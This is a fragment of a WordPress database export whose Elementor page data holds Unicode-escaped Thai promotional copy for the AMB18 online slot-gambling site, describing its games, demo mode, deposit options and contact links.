\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2858,388,'_thumbnail_id','371'),(2859,388,'_elementor_edit_mode','builder'),(2860,388,'_elementor_template_type','wp-page'),(2861,388,'_elementor_version','3.35.5'),(2862,388,'_elementor_pro_version','3.32.3'),(2863,388,'_wp_page_template','default'),(2864,388,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2865,388,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 